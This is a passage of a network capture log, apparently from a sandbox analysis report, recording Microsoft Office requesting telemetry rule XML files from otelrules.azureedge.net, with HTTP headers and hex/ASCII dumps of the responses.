2024-12-08 12:31:55 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:54 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: ef8e0549-001e-0066-1d03-48561e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123154Z-r1cf579d778v97q7hC1EWRf95c00000004zg000000002s78 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:55 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.6	49855	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:54 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:55 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:54 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: a85144f8-201e-0033-7f03-48b167000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123154Z-r1cf579d778dfdgnhC1EWRd3w00000000550000000003ea0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:55 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.6	49856	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:55 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:55 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:55 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: 8a7a9c83-801e-0078-4106-48bac6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123155Z-r1cf579d778bb9vvhC1EWRs9540000000500000000001yeb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:55 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.6	49857	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:55 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:56 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:56 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: 3fcff9c6-e01e-0052-0a03-48d9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123156Z-r1cf579d7788pwqzhC1EWRrpd800000005p0000000002avg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:56 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.6	49858	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:56 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:57 UTC	495	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:56 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: 09d70899-501e-008c-3f6d-49cd39000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123156Z-r1cf579d778xq4f9hC1EWRx41g000000058g0000000018sc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-12-08 12:31:57 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.6	49859	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:56 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:57 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:57 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: 44286e75-701e-0032-5705-48a540000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123157Z-r1cf579d778v97q7hC1EWRf95c00000004zg000000002s9n x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:57 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.6	49860	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:56 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:57 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:57 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE6431446" x-ms-request-id: 32ce5259-b01e-003e-4804-488e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123157Z-r1cf579d778lntp7hC1EWR9gg400000004rg000000004x3d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:57 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.6	49861	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:57 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:58 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:57 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: 1ccbfaf0-201e-0003-3306-48f85a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123157Z-r1cf579d7789trgthC1EWRkkfc0000000600000000004ghr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:58 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.6	49862	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:58 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:58 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:58 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: 8eb9891a-501e-005b-7103-48d7f7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123158Z-r1cf579d778mvsklhC1EWRkavg00000005ng000000002hq6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:58 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.6	49863	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:58 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:59 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:59 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: 83446ce3-101e-0046-0a10-4891b0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123159Z-r1cf579d778dndrdhC1EWR4b2400000004wg000000005syh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:59 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.6	49864	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:58 UTC	192	OUT	GET /rules/rule700050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:59 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:59 GMT Content-Type: text/xml Content-Length: 1352 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BE9DEEE28" x-ms-request-id: 1ec3a3fb-701e-0001-7303-48b110000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123159Z-r1cf579d778bb9vvhC1EWRs95400000004z0000000002pcw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:59 UTC	1352	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.6	49865	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:59 UTC	192	OUT	GET /rules/rule702951v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:59 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:59 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE12B5C71" x-ms-request-id: fc2f82a1-a01e-006f-4f06-4813cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123159Z-r1cf579d7788pwqzhC1EWRrpd800000005pg000000001tds x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:59 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" 